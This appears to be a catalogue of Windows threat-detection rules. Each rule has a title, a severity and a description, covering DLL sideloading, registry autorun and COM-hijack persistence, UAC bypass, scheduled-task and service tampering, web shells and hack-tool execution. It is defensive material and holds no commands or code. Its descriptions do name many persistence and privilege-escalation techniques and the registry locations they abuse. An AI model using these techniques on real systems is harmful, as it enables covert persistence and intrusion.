Potential DLL Sideloading Via JsSchHlpmediumDetects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
Potential Libvlc.DLL SideloadingmediumDetects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe"
Potential DLL Sideloading Of Non-Existent DLLs From System FoldershighDetects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.
Microsoft Office DLL SideloadhighDetects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
DLL Sideloading Of ShellChromeAPI.DLLhighDetects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Third Party Software DLL SideloadingmediumDetects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
Fax Service DLL Search Order HijackhighThe Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
VMGuestLib DLL SideloadmediumDetects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
VMMap Signed Dbghelp.DLL Potential SideloadingmediumDetects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap.
VMMap Unsigned Dbghelp.DLL Potential SideloadinghighDetects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap.
Potential Wazuh Security Platform DLL SideloadingmediumDetects potential DLL side loading of DLLs that are part of the Wazuh security platform
Windows Spooler Service Suspicious Binary LoadinformationalDetect DLL Load from Spooler Service backup folder
Unsigned Module Loaded by ClickOnce ApplicationmediumDetects unsigned module load by ClickOnce application.
UAC Bypass With Fake DLLhighAttempts to load dismcore.dll after dropping it
WMI Persistence - Command Line Event ConsumerhighDetects WMI command line event consumers
Remote Access Tool - AnyDesk Incoming ConnectionmediumDetects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
Potentially Suspicious Malware Callback CommunicationhighDetects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
Communication To Uncommon Destination PortsmediumDetects programs that connect to uncommon destination ports
Powershell Create Scheduled TaskmediumAdversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code
Registry-Free Process Scope COR_PROFILERmediumAdversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)
PowerShell Create Local UsermediumDetects creation of a local user via PowerShell
Manipulation of User Computer or Group Security Principals Across ADmediumAdversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..
Service Registry Permissions Weakness CheckmediumAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScriptmediumDetects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
Powershell LocalAccount ManipulationmediumAdversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups
Code Executed Via Office Add-in XLL FilehighAdversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs
PowerShell Web Access Installation - PsScripthighDetects the installation and configuration of PowerShell Web Access, which could be used for remote access and potential abuse
Potential Persistence Via Security Descriptors - ScriptBlockhighDetects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Suspicious GetTypeFromCLSID ShellExecutemediumDetects suspicious Powershell code that execute COM Objects
Suspicious Service DACL Modification Via Set-Service Cmdlet - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potential Persistence Via PowerShell User Profile Using Add-ContentmediumDetects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence
Abuse of Service Permissions to Hide Services Via Set-Service - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Winlogon Helper DLLmediumWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXEmediumDetects potential malicious and unauthorized usage of bcdedit.exe
Suspicious Download From Direct IP Via BitsadminhighDetects usage of bitsadmin downloading a file using an URL that contains an IP
File Download Via BitsadminmediumDetects usage of bitsadmin downloading a file
Suspicious Download From File-Sharing Website Via BitsadminhighDetects usage of bitsadmin downloading a file from a suspicious domain
File With Suspicious Extension Downloaded Via BitsadminhighDetects usage of bitsadmin downloading a file with a suspicious extension
File Download Via Bitsadmin To A Suspicious Target FolderhighDetects usage of bitsadmin downloading a file to a suspicious target folder
File Download Via Bitsadmin To An Uncommon Target FoldermediumDetects usage of bitsadmin downloading a file to uncommon target folder
Chromium Browser Instance Executed With Custom ExtensionmediumDetects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension
Suspicious Chromium Browser Instance Executed With Custom ExtensionhighDetects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
Change Default File Association Via AssoclowDetects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Change Default File Association To Executable Via AssochighDetects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Potential Privilege Escalation Using Symlink Between Osk and CmdhighDetects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
Sticky Key Like Backdoor ExecutioncriticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Control Panel ItemshighDetects the malicious use of a control panel item
PowerShell Web Access Feature Enabled Via DISMhighDetects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
HackTool - CrackMapExec ExecutionhighThis rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - Default PowerSploit/Empire Scheduled Task CreationhighDetects the creation of a schtask via PowerSploit or Empire Default Configuration.
HackTool - SharPersist ExecutionhighDetects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
IIS Native-Code Module Command Line InstallationmediumDetects suspicious IIS native-code module installations via command line
Suspicious IIS Module RegistrationhighDetects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
Suspicious Shells Spawn by Java Utility KeytoolhighDetects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
Suspicious Processes Spawned by Java.EXEhighDetects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
Shell Process Spawned by Java.EXEmediumDetects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
Suspicious Driver Install by pnputil.exemediumDetects when a possible suspicious driver is being installed via pnputil.exe lolbin
Suspicious GrpConv ExecutionhighDetects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
Suspicious Child Process Of SQL ServerhighDetects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
Suspicious Child Process Of Veeam DabatasecriticalDetects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
Potential Persistence Via Netsh Helper DLLmediumDetects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
New User Created Via Net.EXEmediumIdentifies the creation of local users via the net.exe command.
New User Created Via Net.EXE With Never Expire OptionhighDetects creation of local users via the net.exe command with the option "never expire"
Password Provided In Command Line Of Net.EXEmediumDetects a when net.exe is called with a password in the command line
New Service Creation Using PowerShelllowDetects the creation of a new service using powershell.
Abuse of Service Permissions to Hide Services Via Set-ServicehighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Unsigned AppX Installation Attempt Using Add-AppxPackagemediumDetects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
MSExchange Transport Agent InstallationmediumDetects the Installation of a Exchange Transport Agent
Suspicious Service DACL Modification Via Set-Service CmdlethighDetects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
PUA - Process Hacker ExecutionmediumDetects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - System Informer ExecutionmediumDetects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
Suspicious Debugger Registration CmdlinehighDetects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
Potential Persistence Via Logon Scripts - CommandLinehighDetects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
Persistence Via TypedPaths - CommandLinemediumDetects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. Which might indicate persistence attempt
Potential Persistence Attempt Via Run Keys Using Reg.EXEmediumDetects suspicious command line reg.exe tool adding key to RUN key in Registry
Direct Autorun Keys ModificationmediumDetects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
Changing Existing Service ImagePath Value Via Reg.EXEmediumAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
Rundll32 Registered COM Objectshighload malicious registered COM objects
Suspicious Schtasks Execution AppData FolderhighDetects the creation of a schtask that executes a file from C:\Users\\AppData\Local
Scheduled Task Creation Via Schtasks.EXElowDetects the creation of scheduled tasks by user accounts via the "schtasks" utility.
Suspicious Scheduled Task Creation Involving Temp FolderhighDetects the creation of scheduled tasks that involves a temporary folder and runs only once
Uncommon One Time Only Scheduled Task At 00:00highDetects scheduled task creation events that include suspicious actions, and is run once at 00:00
Potential Persistence Via Microsoft Compatibility AppraisermediumDetects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key.
Potential Persistence Via Powershell Search Order Hijacking - TaskhighDetects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
Scheduled Task Executing Payload from RegistrymediumDetects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
Scheduled Task Executing Encoded Payload from RegistryhighDetects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
Suspicious Scheduled Task Creation via Masqueraded XML FilemediumDetects the creation of a scheduled task using the "-XML" flag with a file without the '.xml' extension. This behavior could be indicative of potential defense evasion attempt during persistence
Schtasks Creation Or Modification With SYSTEM PrivilegeshighDetects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
Possible Privilege Escalation via Weak Service PermissionshighDetection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand
New Service Creation Using Sc.EXElowDetects the creation of a new service using the "sc.exe" utility.
New Kernel Driver Via SC.EXEmediumDetects creation of a new service (kernel driver) with the type "kernel"
Allow Service Access Using Security Descriptor Tampering Via Sc.EXEhighDetects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.
Deny Service Access Using Security Descriptor Tampering Via Sc.EXEhighDetects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
Service DACL Abuse To Hide Services Via Sc.EXEhighDetects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
Service Security Descriptor Tampering Via Sc.EXEmediumDetection of sc.exe utility adding a new service with special permission which hides that service.
Suspicious Service Path ModificationhighDetects service path modification via the "sc" binary to a suspicious command or path
Potential Persistence Attempt Via Existing Service TamperingmediumDetects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
Potential Shim Database Persistence via Sdbinst.EXEmediumDetects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Uncommon Extension Shim Database Installation Via Sdbinst.EXEmediumDetects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
Potential Suspicious Activity Using SeCEditmediumDetects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
Potential Amazon SSM Agent HijackingmediumDetects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
User Added to Local Administrators GroupmediumDetects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
User Added To Highly Privileged GrouphighDetects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
User Added to Remote Desktop Users GrouphighDetects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
Writing Of Malicious Files To The Fonts FoldermediumMonitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from.
Suspicious Process Execution From Fake Recycle.Bin FolderhighDetects process execution from a fake recycle bin folder, often used to avoid security solution.
Suspicious New Service CreationhighDetects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
Tasks Folder EvasionhighThe Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
Sysinternals PsService ExecutionmediumDetects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
Sysinternals PsSuspend ExecutionmediumDetects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
Uncommon Userinit Child ProcesshighDetects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change ScriptmediumDetects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change ScripthighDetects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
VMToolsd Suspicious Child ProcesshighDetects suspicious child process creations of VMware Tools process which may indicate persistence setup
Chopper Webshell Process PatternhighDetects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells
Webshell Hacking Activity PatternshighDetects certain parent child patterns found in cases in which a web shell is used to perform certain credential dumping or exfiltration activities on a compromised system
Webshell Detection With Command Line KeywordshighDetects certain command line parameters often used during reconnaissance activity via web shells
Suspicious Process By Web Server ProcesshighDetects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
Webshell Tool Reconnaissance ActivityhighDetects processes spawned from web servers (PHP, Tomcat, IIS, etc.) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands
Suspicious WindowsTerminal Child ProcessesmediumDetects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
Suspicious Processes Spawned by WinRMhighDetects suspicious processes including shells spawnd from WinRM host process
New ActiveScriptEventConsumer Created Via Wmic.EXEhighDetects WMIC executions in which an event consumer gets created. This could be used to establish persistence
WMI Backdoor Exchange Transport AgentcriticalDetects a WMI backdoor in Exchange Transport Agents via WMI event filters
WMI Persistence - Script Event ConsumermediumDetects WMI script event consumers
UEFI Persistence Via Wpbbin - ProcessCreationhighDetects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
Potential Persistence Via New AMSI Providers - RegistryhighDetects when an attacker registers a new AMSI provider in order to achieve persistence
Potential COM Object Hijacking Via TreatAs Subkey - RegistrymediumDetects COM object hijacking via TreatAs subkey
Potential Persistence Via Disk Cleanup Handler - RegistrymediumDetects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
Potential Persistence Via Logon Scripts - RegistrymediumDetects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
Creation of a Local Hidden User Account by RegistryhighSysmon registry detection of a local hidden user account.
Path To Screensaver Binary ModifiedmediumDetects value modification of registry key containing path to binary used as screensaver.
Narrator's Feedback-Hub PersistencehighDetects abusing Windows 10 Narrator's Feedback-Hub
New DLL Added to AppCertDlls Registry KeymediumDynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.
New DLL Added to AppInit_DLLs Registry KeymediumDLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll
Office Application Startup - Office TestmediumDetects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started
Registry Persistence Mechanisms in Recycle BinhighDetects persistence registry keys for Recycle Bin
WINEKEY Registry ModificationhighDetects potential malicious modification of run keys by winekey or team9 backdoor
Security Support Provider (SSP) Added to LSA ConfigurationhighDetects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
Sticky Key Like Backdoor Usage - RegistrycriticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Atbroker Registry ChangemediumDetects creation/modification of Assistive Technology applications and persistence with usage of 'at'
Suspicious Run Key from DownloadhighDetects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
DLL Load via LSASShighDetects a method to load DLL via LSASS process using an undocumented Registry key
Add Port Monitor Persistence in RegistrymediumAdversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
Add Debugger Entry To AeDebug For PersistencemediumDetects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes
CurrentVersion Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Common Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Classes Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
CurrentControlSet Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
CurrentVersion NT Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Internet Explorer Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Office Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Session Manager Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
System Scripts Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
WinSock2 Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Wow6432Node CurrentVersion Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Wow6432Node Classes Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Wow6432Node Windows NT CurrentVersion Autorun Keys ModificationmediumDetects modification of autostart extensibility point (ASEP) in registry.
Bypass UAC Using Event ViewerhighBypasses User Account Control using Event Viewer and a relevant Windows Registry modification
Default RDP Port Changed to Non Standard PorthighDetects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
IE Change Domain ZonemediumHides the file extension through modification of the registry
Running Chrome VPN Extensions via the Registry 2 VPN ExtensionhighRunning Chrome VPN Extensions via the Registry install 2 vpn extension
Potential Registry Persistence Attempt Via DbgManagedDebuggermediumDetects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes
Persistence Via Disk Cleanup Handler - AutorunmediumDetects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
Directory Service Restore Mode(DSRM) Registry Value TamperinghighDetects changes to "DsrmAdminLogonBehavior" registry value. During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
Enabling COR Profiler Environment VariablesmediumDetects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
Add Debugger Entry To Hangs Key For PersistencehighDetects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes
Persistence Via Hhctrl.ocxhighDetects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary
Registry Modification to Hidden File ExtensionmediumHides the file extension through modification of the registry
Potential Persistence Via Netsh Helper DLL - RegistrymediumDetects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
New Netsh Helper DLL Registered From A Suspicious LocationhighDetects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
New ODBC Driver RegisteredlowDetects the registration of a new ODBC driver.
Potentially Suspicious ODBC Driver RegisteredhighDetects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
Potential Persistence Via Outlook LoadMacroProviderOnBoot SettinghighDetects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
Outlook Macro Execution Without Warning Setting EnabledhighDetects the modification of Outlook security setting to allow unprompted execution of macros.
Outlook Security Settings Updated - RegistrymediumDetects changes to the registry values related to outlook security settings
Potential Persistence Using DebugPathmediumDetects potential persistence using Appx DebugPath
Potential Persistence Via AppCompat RegisterAppRestart LayermediumDetects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.
Potential Persistence Via App Paths Default PropertyhighDetects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence The entries found under App Paths are used primarily for the following purposes. First, to map an application's executable file name to that file's fully qualified path. Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
Potential Persistence Via AutodialDLLhighDetects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
Potential Persistence Via CHM Helper DLLhighDetects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
Potential PSFactoryBuffer COM HijackinghighDetects changes to the PSFactory COM InProcServer32 registry. This technique was used by RomCom to create persistence storing a malicious DLL.
COM Object Hijacking Via Modification Of Default System CLSID Default ValuehighDetects potential COM object hijacking via modification of default system CLSID.
Potential Persistence Via Event Viewer Events.aspmediumDetects potential registry persistence technique using the Event Viewer "Events.asp" technique
Potential Persistence Via GlobalFlagshighDetects registry persistence technique using the GlobalFlags and SilentProcessExit keys
Register New IFiltre For PersistencemediumDetects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
Potential Persistence Via LSA ExtensionshighDetects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
Potential Persistence Via MpnotifyhighDetects when an attacker register a new SIP provider for persistence and defense evasion
Potential Persistence Via Excel Add-in - RegistryhighDetect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
Potential Persistence Via MyComputer Registry KeyshighDetects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
Potential Persistence Via TypedPathshighDetects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
Potential Persistence Via Outlook Today PagehighDetects potential persistence activity via outlook today page. An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
Potential Persistence Via Scrobj.dll COM HijackingmediumDetect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute
Potential Persistence Via Visual Studio Tools for OfficemediumDetects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
Suspicious Shim Database Patching ActivityhighDetects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
Potential Persistence Via Outlook Home PagehighDetects potential persistence activity via outlook home page. An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
Potential Persistence Via DLLPathOverridehighDetects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
Potential Persistence Via Shim Database In Uncommon LocationhighDetects the installation of a new shim database where the file is located in a non-default location
Potential Persistence Via Shim Database ModificationmediumAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
Suspicious Powershell In Registry Run KeysmediumDetects potential PowerShell commands or code within registry run keys
Potential SentinelOne Shell Context Menu Scan Command TamperingmediumDetects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne.
ServiceDll HijackmediumDetects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.
Persistence Via New SIP ProvidermediumDetects when an attacker register a new SIP provider for persistence and defense evasion
Suspicious Environment Variable Has Been RegisteredhighDetects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
Registry Persistence via Explorer Run KeyhighDetects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
New RUN Key Pointing to Suspicious FolderhighDetects suspicious new RUN key element pointing to an executable in a suspicious folder
Modify User Shell Folders Startup ValuehighDetect modification of the startup key to a path where a payload could be stored to be launched during startup
Scheduled TaskCache Change by Uncommon ProgramhighMonitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious
Potential Registry Persistence Attempt Via Windows TelemetryhighDetects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
RDP Sensitive Settings Changed to ZeromediumDetects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
RDP Sensitive Settings ChangedhighDetects tampering of RDP Terminal Service/Server sensitive settings. Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
New TimeProviders Registered With Uncommon DLL NamehighDetects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.
COM Hijacking via TreatAsmediumDetect modification of TreatAs key to enable "rundll32.exe -sta" command
VBScript Payload Stored in RegistryhighDetects VBScript content stored into registry keys as seen being used by UNC2452 group
Winget Admin Settings ModificationlowDetects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks
